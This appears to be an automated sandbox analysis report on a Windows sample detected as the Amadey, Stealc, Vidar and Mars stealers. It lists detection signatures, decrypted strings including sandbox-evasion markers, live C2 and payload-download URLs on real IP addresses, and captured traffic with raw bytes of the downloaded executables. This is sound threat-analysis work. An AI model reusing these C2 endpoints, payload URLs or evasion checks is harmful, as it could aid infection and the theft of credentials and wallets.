Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1467852
MD5: de1d8c161d81ba79c888fef77c75db93
SHA1: 55e3b5e658d41d98779214afb48d34c66bf17346
SHA256: 31cbdcdb540d6bc6fbc616c288f6f7ad7c74fe74eff55a135dafc31853b76126
Tags: exe
Infos:

Detection

Amadey, Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadeys stealer DLL
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://77.91.77.81/stealc/random.exe- Avira URL Cloud: Label: phishing
Source: http://77.91.77.82/Hun4Ko/index.php Avira URL Cloud: Label: phishing
Source: http://77.91.77.82/Hun4Ko/index.php/QLIa Avira URL Cloud: Label: phishing
Source: http://77.91.77.82/Hun4Ko/index.php/ Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/mine/amadka.exe-Disposition: Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/mine/amadka.exe00 Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/cost/go.exepData Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/stealc/random.exe Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exeT Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/well/random.exeL Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/mine/amadka.exe Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exe Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/well/random.exe Avira URL Cloud: Label: malware
Source: http://77.91.77.81/well/random.exen Avira URL Cloud: Label: phishing
Source: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/cost/go.exe00 Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/stealc/random.exe506 Avira URL Cloud: Label: phishing
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amadka[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Avira: detection malicious, Label: TR/AutoIt.zstul
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Avira: detection malicious, Label: TR/AutoIt.zstul
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 14.2.0244247334.exe.720000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.30/920475a59bac849d.php"}
Source: explorti.exe.4724.13.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php", "http://77.91.77.82/Hun4Ko/index.php"]}
Source: file.exe.3472.0.memstrmin Malware Configuration Extractor: StealC {"C2 url": "85.28.47.30/920475a59bac849d.php"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe ReversingLabs: Detection: 42%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 47%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amadka[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetProcAddress
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: LoadLibraryA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: lstrcatA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: OpenEventA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: CreateEventA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: CloseHandle
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: Sleep
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetUserDefaultLangID
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: VirtualAllocExNuma
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: VirtualFree
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetSystemInfo
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: VirtualAlloc
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: HeapAlloc
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetComputerNameA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: lstrcpyA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetProcessHeap
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetCurrentProcess
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: lstrlenA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: ExitProcess
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetSystemTime
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: SystemTimeToFileTime
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: advapi32.dll
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: gdi32.dll
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: user32.dll
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: crypt32.dll
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: ntdll.dll
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetUserNameA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: CreateDCA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetDeviceCaps
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: ReleaseDC
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: CryptStringToBinaryA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: sscanf
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: VMwareVMware
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: HAL9TH
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: JohnDoe
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: DISPLAY
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: %hu/%hu/%hu
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: http://85.28.47.30
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: /920475a59bac849d.php
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: /69934896f997d5bb/
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: Nice
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetFileAttributesA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GlobalLock
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: HeapFree
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetFileSize
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GlobalSize
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: IsWow64Process
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: Process32Next
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetLocalTime
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: FreeLibrary
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetTimeZoneInformation
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetSystemPowerStatus
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetVolumeInformationA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: Process32First
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetLocaleInfoA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetModuleFileNameA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: DeleteFileA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: FindNextFileA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: LocalFree
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: FindClose
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: LocalAlloc
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetFileSizeEx
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: ReadFile
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: SetFilePointer
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: WriteFile
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: CreateFileA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: FindFirstFileA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: CopyFileA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: VirtualProtect
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetLastError
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: lstrcpynA
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: MultiByteToWideChar
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GlobalFree
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: WideCharToMultiByte
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GlobalAlloc
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: OpenProcess
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: TerminateProcess
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: GetCurrentProcessId
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: gdiplus.dll
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: ole32.dll
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: bcrypt.dll
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: wininet.dll
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: shlwapi.dll
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: shell32.dll
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: psapi.dll
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: rstrtmgr.dll
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: SelectObject
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: BitBlt
Source: 14.2.0244247334.exe.720000.0.unpack String decryptor: DeleteObject
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C566C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C566C80
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49743 version: TLS 1.0
Source: unknown HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2482321906.000000006C5CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2482604755.000000006C78F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2482604755.000000006C78F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2482321906.000000006C5CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.5:49704 -> 85.28.47.30:80
Source: Traffic Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.5:49704 -> 85.28.47.30:80
Source: Traffic Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 85.28.47.30:80 -> 192.168.2.5:49704
Source: Traffic Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.5:49704 -> 85.28.47.30:80
Source: Traffic Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 85.28.47.30:80 -> 192.168.2.5:49704
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 85.28.47.30/920475a59bac849d.php
Source: Malware configuration extractor URLs: http://85.28.47.30/920475a59bac849d.php
Source: Malware configuration extractor IPs: 77.91.77.82
Source: Malware configuration extractor IPs: 77.91.77.82
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 04 Jul 2024 20:20:24 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 04 Jul 2024 20:20:29 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 